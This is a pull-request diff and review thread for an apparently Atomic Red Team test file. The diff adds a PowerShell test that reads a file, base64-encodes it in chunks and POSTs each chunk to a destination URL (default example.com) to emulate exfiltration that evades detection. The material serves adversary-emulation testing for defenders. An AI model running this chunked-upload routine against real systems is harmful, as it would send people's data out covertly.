atomics/T1030/T1030.yaml

```diff
@@ -31,3 +31,40 @@ atomic_tests:
     cleanup_command: |
       if [ -f #{folder_path}/safe_to_delete ]; then rm -rf #{folder_path}; fi;
     name: sh
+
+- name: Network-Based Data Transfer in Small Chunks
+  description: "Simulate transferring data over a network in small chunks to evade detection."
+  supported_platforms:
+    - "windows"
+  auto_generated_guid: 9dc4dbee-898c-4237-8484-9f28574b8538
+  input_arguments:
+    source_file_path:
+      description: "Path to the source file to transfer."
+      type: "string"
+      default: "[User specified]"
+    destination_url:
+      description: "URL of the destination server."
+      type: "string"
+      default: "http://example.com"
+    chunk_size:
+      description: "Size of each data chunk (in KB)."
+      type: "integer"
+      default: 1024
+  executor:
+    name: "powershell"
+    elevation_required: false
+    command: |
+      $file = [System.IO.File]::OpenRead(#{source_file_path})
+      $chunkSize = #{chunk_size} * 1KB
+      $buffer = New-Object Byte[] $chunkSize
+  
+      while ($bytesRead = $file.Read($buffer, 0, $buffer.Length)) {
+          $encodedChunk = [Convert]::ToBase64String($buffer, 0, $bytesRead)
+          Invoke-WebRequest -Uri #{destination_url} -Method Post -Body $encodedChunk
+      }
+      $file.Close()
+  cleanup_commands:
+    - "No cleanup required as this script does not create files or modify system state."
+  detection:
```

Comment:
We request to have no "extra" yaml tags such is the `detection:` section. If additional notes are needed, that can be added to the description element. We generally don't include detection info with the atomics and prefer this information be removed. thank you

Reply:
thanks, @clr2of8  for your inputs. let me make the changes and update.

Reply:
Done' I've made changes